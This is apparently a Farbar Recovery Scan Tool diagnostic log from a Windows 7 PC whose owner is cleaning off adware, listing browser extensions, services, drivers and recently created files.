BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation)
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab
DPF: {CAFEEFAC-0017-0000-0065-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL (Microsoft Corporation)
Tcpip\..\Interfaces\{DF8F4EFA-845F-4DAC-9766-DA2114A623BE}: [NameServer] 203.187.192.15 203.187.242.6

FireFox:
========
FF ProfilePath: C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF Plugin: @java.com/DTPlugin,version=10.65.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.65.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~4\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.1.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.5 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin HKU\S-1-5-21-1443430433-3504582150-3450442512-1000: @talk.google.com/GoogleTalkPlugin -> C:\Users\VIJAY\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKU\S-1-5-21-1443430433-3504582150-3450442512-1000: @talk.google.com/O1DPlugin -> C:\Users\VIJAY\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKU\S-1-5-21-1443430433-3504582150-3450442512-1000: @tools.google.com/Google Update;version=3 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-1443430433-3504582150-3450442512-1000: @tools.google.com/Google Update;version=9 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMeetingJoinPluginOC.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppl3260.dll (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprpplugin.dll (RealPlayer Cloud)
FF Plugin ProgramFiles/Appdata: C:\Users\VIJAY\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\VIJAY\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF SearchPlugin: C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\searchplugins\firefox-add-ons.xml
FF Extension: UnniDeals   - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\d@WhEVH6.net [2015-02-10]
FF Extension: DownloadHelper - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d} [2014-08-17]
FF Extension: Flash and Video Download - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\{bee6eb20-01e0-ebd1-da83-080329fb9a3a} [2014-08-17]
FF Extension: Selenium IDE: C# Formatters - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\csharpformatters@seleniumhq.org.xpi [2014-06-28]
FF Extension: Firebug - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\firebug@software.joehewitt.com.xpi [2014-06-25]
FF Extension: FirePath - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\FireXPath@pierre.tholence.com.xpi [2014-06-25]
FF Extension: Selenium IDE: Java Formatters - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\javaformatters@seleniumhq.org.xpi [2014-06-28]
FF Extension: Compare Hatke - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\jid1-9ETkKdBARv7Iww@jetpack.xpi [2014-10-17]
FF Extension: Selenium IDE: Python Formatters - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\pythonformatters@seleniumhq.org.xpi [2014-06-28]
FF Extension: Selenium IDE: Ruby Formatters - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\rubyformatters@seleniumhq.org.xpi [2014-06-28]
FF Extension: CouponsHelper - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\{239cc760-75a9-4276-b1fc-c0ceb963f373}.xpi [2014-09-03]
FF Extension: Selenium IDE - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\{a6fd85ed-e919-4a43-a5af-8da18bda539f}.xpi [2014-06-28]

Chrome:
=======
CHR Profile: C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-10]
CHR Extension: (Google Docs) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-10]
CHR Extension: (Google Drive) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-02-10]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2015-02-10]
CHR Extension: (YouTube) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-02-10]
CHR Extension: (Google Search) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-02-10]
CHR Extension: (Google Sheets) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-10]
CHR Extension: (Google Wallet) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-02-10]
CHR Extension: (Gmail) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-02-10]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ccEvtMgr; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [108456 2013-09-04] (Symantec Corporation)
R2 ccSetMgr; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [108456 2013-09-04] (Symantec Corporation)
S3 GameConsoleService; C:\Program Files\HP Games\HP Game Console\GameConsoleService.exe [250616 2009-05-22] (WildTangent, Inc.)
R2 HP Health Check Service; C:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe [124928 2009-07-10] (Hewlett-Packard) [File not signed]
R2 HWDeviceService.exe; C:\ProgramData\DatacardService\HWDeviceService.exe [264704 2010-11-16] () [File not signed]
R2 Lavasoft Ad-Aware Service; C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe [921936 2009-01-19] (Lavasoft)
R2 LightScribeService; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [73728 2009-06-18] (Hewlett-Packard Company) [File not signed]
S3 LiveUpdate; C:\Program Files\Symantec\LiveUpdate\LuComServer_3_3.EXE [3093944 2011-01-19] (Symantec Corporation)
R2 NvNetworkService; C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [17536800 2014-07-25] (NVIDIA Corporation)
R2 RichVideo; C:\Program Files\CyberLink\Shared files\RichVideo.exe [247152 2009-01-22] ()
R2 SmcService; C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe [1893840 2013-09-04] (Symantec Corporation)
S4 SNAC; C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE [357792 2013-09-04] (Symantec Corporation)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_9691412ff1876250\STacSV.exe [229458 2010-03-23] (IDT, Inc.)
R2 Symantec AntiVirus; C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe [1839888 2013-09-04] (Symantec Corporation)
R2 TracSrvWrapper; C:\Program Files\CheckPoint\Endpoint Connect\TracSrvWrapper.exe [4512952 2011-09-14] (Check Point Software Technologies)
R2 UI Assistant Service; C:\Program Files\Reliance 3G\AssistantServices.exe [275784 2012-11-26] ()
R2 VmbService; C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\VmbService.exe [9216 2011-06-28] (Vodafone) [File not signed]
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 eeCtrl; C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys [378672 2014-11-26] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [111408 2014-11-26] (Symantec Corporation)
S3 massfilter; C:\Windows\System32\DRIVERS\massfilter.sys [9216 2011-08-29] (MBB Incorporated)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2015-02-10] (Malwarebytes Corporation)
R3 NAVENG; C:\ProgramData\Symantec\Definitions\VirusDefs\20150105.019\NAVENG.SYS [95704 2014-08-11] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Symantec\Definitions\VirusDefs\20150105.019\NAVEX15.SYS [1636696 2014-08-11] (Symantec Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19232 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad32v.sys [34080 2014-03-31] (NVIDIA Corporation)
R1 SPBBCDrv; C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys [421424 2013-09-04] (Symantec Corporation)
R1 SRTSP; C:\Windows\System32\Drivers\SRTSP.SYS [287352 2013-09-04] (Symantec Corporation)
S3 SRTSPL; C:\Windows\System32\Drivers\SRTSPL.SYS [321016 2013-09-04] (Symantec Corporation)
R1 SRTSPX; C:\Windows\System32\Drivers\SRTSPX.SYS [43768 2013-09-04] (Symantec Corporation)
S3 ssudobex; C:\Windows\System32\DRIVERS\ssudobex.sys [181912 2013-06-05] (DEVGURU Co., LTD.(www.devguru.co.kr))
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT.SYS [125488 2014-06-15] (Symantec Corporation)
R3 SYMREDRV; C:\Windows\System32\Drivers\SYMREDRV.SYS [26416 2013-09-04] (Symantec Corporation)
R1 SYMTDI; C:\Windows\System32\Drivers\SYMTDI.SYS [188080 2013-09-04] (Symantec Corporation)
S4 SysPlant; C:\Windows\SYSTEM32\Drivers\SysPlant.sys [99744 2013-09-04] (Symantec Corporation)
R3 Teefer2; C:\Windows\System32\DRIVERS\teefer2.sys [67520 2013-09-04] (Symantec Corporation)
R3 vna_ap; C:\Windows\System32\DRIVERS\vnaap.sys [129304 2011-09-14] (Check Point Software Technologies)
R3 vodafone_K3805-z_dc_enum; C:\Windows\System32\DRIVERS\vodafone_K3805-z_dc_enum.sys [61952 2010-09-01] (Vodafone)
S3 vodafone_zte_cdc_acm; C:\Windows\System32\DRIVERS\vodafone_zte_cdc_acm.sys [67968 2011-05-20] (Vodafone)
S3 vodafone_zte_cdc_ecm; C:\Windows\System32\DRIVERS\vodafone_zte_cdc_ecm.sys [52224 2011-05-20] (Vodafone)
S3 vodafone_zte_cpo; C:\Windows\System32\DRIVERS\vodafone_zte_cpo.sys [9984 2011-05-20] (Vodafone)
S3 vodafone_zte_ecm_enum; C:\Windows\System32\DRIVERS\vodafone_zte_ecm_enum.sys [47488 2011-05-20] (Vodafone)
S3 vodafone_zte_ecm_enum_filter; C:\Windows\System32\DRIVERS\vodafone_zte_ecm_enum_filter.sys [47488 2011-05-20] (Vodafone)
R1 vsdatant; C:\Windows\System32\DRIVERS\vsdatant.sys [455336 2011-09-12] (Check Point Software Technologies Ltd.)
S3 wirelessusbser; C:\Windows\System32\DRIVERS\3GDatausbser.sys [102656 2009-04-07] (QUALCOMM Incorporated)
R1 WPS; C:\Windows\system32\drivers\wpsdrvnt.sys [43936 2013-09-04] (Symantec Corporation)
R3 WpsHelper; C:\Windows\system32\drivers\WpsHelper.sys [174056 2012-09-30] (Symantec Corporation)
U5 ew_hwusbdev; C:\Windows\System32\Drivers\ew_hwusbdev.sys [102784 2015-02-08] (Huawei Technologies Co., Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-02-11 12:04 - 2015-02-11 12:05 - 00023540 _____ () C:\Users\VIJAY\Desktop\FRST.txt
2015-02-11 11:46 - 2015-02-11 11:48 - 00000000 ____D () C:\AdwCleaner
2015-02-11 11:44 - 2015-02-11 11:44 - 02112512 _____ () C:\Users\VIJAY\Desktop\AdwCleaner.exe
2015-02-11 11:38 - 2015-02-11 11:38 - 00001238 _____ () C:\Users\VIJAY\Desktop\checkup.txt
2015-02-11 11:32 - 2015-02-11 11:32 - 00852594 _____ () C:\Users\VIJAY\Desktop\SecurityCheck.exe
2015-02-10 12:16 - 2015-02-10 12:17 - 00035879 _____ () C:\Users\VIJAY\Downloads\Addition.txt
2015-02-10 12:15 - 2015-02-10 12:17 - 00042241 _____ () C:\Users\VIJAY\Downloads\FRST.txt
2015-02-10 12:13 - 2015-02-11 12:05 - 00000000 ____D () C:\FRST
2015-02-10 12:13 - 2015-02-10 12:13 - 00000000 ____D () C:\Users\VIJAY\Downloads\FRST-OlderVersion
2015-02-10 12:12 - 2015-02-10 12:13 - 01124352 _____ (Farbar) C:\Users\VIJAY\Desktop\FRST.exe
2015-02-10 12:12 - 2015-02-10 12:12 - 00002889 _____ () C:\Users\VIJAY\Desktop\aswMBR.txt
2015-02-10 12:12 - 2015-02-10 12:12 - 00000512 _____ () C:\Users\VIJAY\Desktop\MBR.dat
2015-02-10 11:41 - 2015-02-10 11:41 - 00158024 _____ () C:\Windows\Minidump\021015-24882-01.dmp
2015-02-10 11:37 - 2015-02-10 11:37 - 05198336 _____ (AVAST Software) C:\Users\VIJAY\Downloads\aswMBR.exe
2015-02-10 11:25 - 2015-02-10 11:25 - 00000628 _____ () C:\Windows\system32\.crusader
2015-02-10 11:17 - 2015-02-10 11:26 - 00000000 ____D () C:\ProgramData\HitmanPro
2015-02-10 11:14 - 2015-02-10 11:16 - 10285456 _____ (SurfRight B.V.) C:\Users\VIJAY\Downloads\HitmanPro.exe
2015-02-10 03:32 - 2015-02-10 03:52 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-02-10 03:32 - 2015-02-10 03:32 - 00001064 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-02-10 03:32 - 2015-02-10 03:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-02-10 03:32 - 2015-02-10 03:32 - 00000000 ____D () C:\ProgramData\Malwarebytes
2015-02-10 03:32 - 2015-02-10 03:32 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2015-02-10 03:32 - 2014-11-21 06:14 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-02-10 03:32 - 2014-11-21 06:14 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-02-10 03:32 - 2014-11-21 06:14 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-02-10 03:30 - 2015-02-10 03:32 - 20447072 _____ (Malwarebytes Corporation ) C:\Users\VIJAY\Downloads\mbam-setup-2.0.4.1028.exe
2015-02-10 03:10 - 2015-02-10 03:10 - 00000000 ____D () C:\Users\VIJAY\Desktop\PUP.Optional.Elex Removal Instructions_files
2015-02-10 02:48 - 2015-02-11 11:57 - 00001176 _____ () C:\Windows\setupact.log
2015-02-10 02:48 - 2015-02-10 10:47 - 00002722 _____ () C:\Windows\PFRO.log
2015-02-10 02:48 - 2015-02-10 02:48 - 00000000 _____ () C:\Windows\setuperr.log
2015-02-10 02:47 - 2015-02-10 02:48 - 00000472 _____ () C:\Windows\Tasks\Ad-Aware Update (Weekly).job
2015-02-10 02:46 - 2015-02-10 02:47 - 00000000 ____D () C:\ProgramData\Lavasoft
2015-02-10 02:46 - 2015-02-10 02:46 - 00001100 _____ () C:\Users\Public\Desktop\Ad-Aware.lnk
2015-02-10 02:46 - 2015-02-10 02:46 - 00000000 __HDC () C:\ProgramData\{83C91755-2546-441D-AC40-9A6B4B860800}
2015-02-10 02:46 - 2015-02-10 02:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2015-02-10 02:46 - 2015-02-10 02:46 - 00000000 ____D () C:\Program Files\Lavasoft
2015-02-10 02:26 - 2015-02-10 02:26 - 00000969 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2015-02-10 02:26 - 2015-02-10 02:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2015-02-10 02:26 - 2015-02-10 02:26 - 00000000 ____D () C:\Program Files\CCleaner
2015-02-10 02:21 - 2015-02-10 02:21 - 00002330 _____ () C:\Users\VIJAY\Desktop\Google Chrome.lnk
2015-02-10 02:21 - 2015-02-10 02:21 - 00000000 ____D () C:\Users\VIJAY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-02-10 02:18 - 2015-02-10 02:18 - 00001121 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2015-02-10 02:18 - 2015-02-10 02:18 - 00001109 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk
2015-02-10 02:18 - 2015-02-10 02:18 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2015-02-10 01:52 - 2015-02-10 01:52 - 00000000 ____D () C:\ProgramData\{2b348a2e-19fb-a825-2b34-48a2e19f28b8}
2015-02-10 01:10 - 2015-02-10 01:10 - 00000000 ____D () C:\ProgramData\hoifinhnlbhamdnldibkogbgiiefbnfh
2015-02-10 01:10 - 2015-02-10 01:10 - 00000000 ____D () C:\Program Files\UnniDeals
2015-02-10 01:08 - 2015-02-10 01:08 - 01100288 _____ () C:\Users\VIJAY\Downloads\S5830i_Modem_Files.zip.exe
2015-02-10 01:03 - 2015-02-10 01:03 - 00000000 ____D () C:\Users\VIJAY\Downloads\SAMSUNG_USB_Driver_for_Mobile_Phones
2015-02-10 01:02 - 2015-02-10 01:03 - 26551126 _____ () C:\Users\VIJAY\Downloads\SAMSUNG_USB_Driver_for_Mobile_Phones.zip
2015-02-10 01:01 - 2015-02-10 01:02 - 00000000 ____D () C:\Users\VIJAY\Downloads\XXLK3
2015-02-10 00:53 - 2015-02-10 00:59 - 132400608 _____ () C:\Users\VIJAY\Downloads\XXLK3.zip
2015-02-08 20:32 - 2015-02-08 20:31 - 01112288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfCoInstaller01007.dll
2015-02-08 20:32 - 2015-02-08 20:31 - 00861696 _____ (DiBcom SA) C:\Windows\system32\Drivers\mod7700.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00353280 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbwwan.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00193792 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbmdm.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00181760 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juwwanecm.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00102784 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwusbdev.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00090112 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcacm.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00073216 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jubusenum.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00064384 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcecm.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00026624 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juextctrl.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00025856 _____ (Huawei Tech. Co., Ltd.) C:\Windows\system32\Drivers\ewdcsc.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00019200 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwupgrade.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00011136 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_usbenumfilter.sys
2015-02-08 20:31 - 2015-02-08 20:33 - 00000000 ____D () C:\ProgramData\DatacardService
2015-02-08 12:15 - 2015-02-08 12:15 - 00000045 _____ () C:\Users\VIJAY\Desktop\olx.txt
2015-02-08 11:50 - 2015-02-08 11:51 - 00000000 ____D () C:\Users\VIJAY\Downloads\S5830i_XXLI1_ODDLI1_DDLI1_by_SplitFUS2
2015-02-08 11:32 - 2015-02-08 11:50 - 131844954 _____ () C:\Users\VIJAY\Downloads\S5830i_XXLI1_ODDLI1_DDLI1_by_SplitFUS2.zip
2015-02-08 11:31 - 2015-02-08 11:31 - 00203676 _____ () C:\Users\VIJAY\Downloads\Odin3-v1.85.zip
2015-02-08 11:31 - 2015-02-08 11:31 - 00000000 ____D () C:\Users\VIJAY\Downloads\Odin3-v1.85
2015-02-08 02:09 - 2015-02-08 02:10 - 00000000 ____D () C:\Users\VIJAY\Downloads\Barfi! 2012 Hindi 720p DvDRip CharmeLeon Silver RG
2015-02-07 15:27 - 2015-02-07 11:11 - 00677285 _____ () C:\Users\VIJAY\Downloads\Samsung 300K Tool.exe
2015-02-06 23:27 - 2015-02-07 21:24 - 00000322 _____ () C:\Windows\Tasks\HPCeeScheduleForVIJAY.job
2015-02-06 03:12 - 2015-02-06 03:12 - 00000000 ____H () C:\Windows\system32\Drivers\Msft_Kernel_WinUsb_01007.Wdf
2015-02-06 02:57 - 2013-06-05 10:48 - 00181912 _____ (DEVGURU Co., LTD.(www.devguru.co.kr)) C:\Windows\system32\Drivers\ssudobex.sys
2015-02-06 02:55 - 2015-02-06 02:55 - 00000000 ____D () C:\Program Files\SAMSUNG
2015-02-06 02:53 - 2015-02-06 02:53 - 00000000 ____D () C:\ProgramData\Samsung
2015-02-06 02:51 - 2015-02-06 02:52 - 15364480 _____ (SAMSUNG Electronics Co., Ltd.) C:\Users\VIJAY\Downloads\SAMSUNG_USB_Driver_for_Mobile_Phones_v1.5.25.0-retail.exe
2015-02-06 02:48 - 2015-02-06 02:48 - 00000000 ____D () C:\Users\VIJAY\Downloads\ODIN_4.38_+_Tass.ops
2015-02-06 02:47 - 2015-02-06 02:47 - 00178811 _____ () C:\Users\VIJAY\Downloads\ODIN_4.38_+_Tass.ops.rar
2015-02-06 02:42 - 2015-02-06 02:42 - 00000000 ____D () C:\Users\VIJAY\Downloads\S5830DDKQ8_S5830ODDKQ7_INS
2015-02-06 02:32 - 2015-02-06 02:39 - 142392990 _____ () C:\Users\VIJAY\Downloads\S5830DDKQ8_S5830ODDKQ7_INS.zip
2015-01-31 10:46 - 2015-01-31 10:46 - 00002166 _____ () C:\Users\Public\Desktop\Vodafone Mobile Broadband.lnk
2015-01-31 10:46 - 2015-01-31 10:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vodafone
2015-01-31 10:46 - 2015-01-31 10:46 - 00000000 ____D () C:\Program Files\Vodafone
2015-01-31 10:45 - 2015-01-31 10:45 - 00000000 ____D () C:\Users\VIJAY\AppData\Local\{B9614B49-C7A3-4D75-A779-03E5B77C119F}
2015-01-30 01:34 - 2015-01-30 02:47 - 1016243528 ____R () C:\Users\VIJAY\Downloads\HN3Y.WD72E5.W0rldFree4u.C0m.mkv
2015-01-24 00:11 - 2015-01-24 00:55 - 00000000 ____D () C:\Users\VIJAY\Downloads\Zid 2014 Hindi HDRip 720p x264 AAC...Hon3y
2015-01-24 00:07 - 2015-01-24 03:20 - 00000000 ____D () C:\Users\VIJAY\Downloads\Borat 2006 720p BRRip x264 MP4 AAC-CC
2015-01-24 00:04 - 2015-01-24 00:05 - 00000000 ____D () C:\Users\VIJAY\Downloads\Gone Girl (2014) 480p 2ch BRRip AAC x264 - [GeekRG]
2015-01-23 23:58 - 2015-01-24 02:44 - 00000000 ____D () C:\Users\VIJAY\Downloads\Kill Dil 2014 720p BluRay x264 Hindi AAC - Ozlem
2015-01-23 23:55 - 2015-01-24 00:00 - 00000000 ____D () C:\Users\VIJAY\Downloads\Baby (2015) [1CD] DVDSCR Audio Cleaned Rip Xvid Mp3 M2TV Exclusive
2015-01-18 20:38 - 2015-01-18 20:38 - 00000046 _____ () C:\Users\VIJAY\Desktop\phones.txt
2015-01-14 00:51 - 2014-12-12 10:41 - 03971512 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2015-01-14 00:51 - 2014-12-12 10:41 - 03916728 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-01-14 00:51 - 2014-12-11 23:17 - 00074240 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2015-01-14 00:50 - 2014-12-19 08:13 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-01-14 00:50 - 2014-12-19 07:04 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2015-01-14 00:50 - 2014-12-06 09:20 - 00242688 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-02-11 12:04 - 2009-07-14 10:04 - 00024192 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-02-11 12:04 - 2009-07-14 10:04 - 00024192 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-02-11 12:01 - 2014-06-19 00:20 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-02-11 12:01 - 2014-06-15 14:54 - 01467268 _____ () C:\Windows\WindowsUpdate.log
2015-02-11 11:58 - 2014-06-15 15:04 - 00000753 _____ () C:\ProgramData\hpqp.ini
2015-02-11 11:57 - 2009-07-14 10:23 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-02-11 11:31 - 2014-08-09 19:40 - 00000856 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1443430433-3504582150-3450442512-1000Core.job
2015-02-11 11:19 - 2014-08-09 19:40 - 00000908 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1443430433-3504582150-3450442512-1000UA.job
2015-02-10 11:41 - 2014-07-06 20:32 - 00000000 ____D () C:\Windows\Minidump
2015-02-10 03:16 - 2014-06-15 03:06 - 00001146 _____ () C:\Users\VIJAY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-02-10 02:48 - 2009-07-14 10:23 - 00032620 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
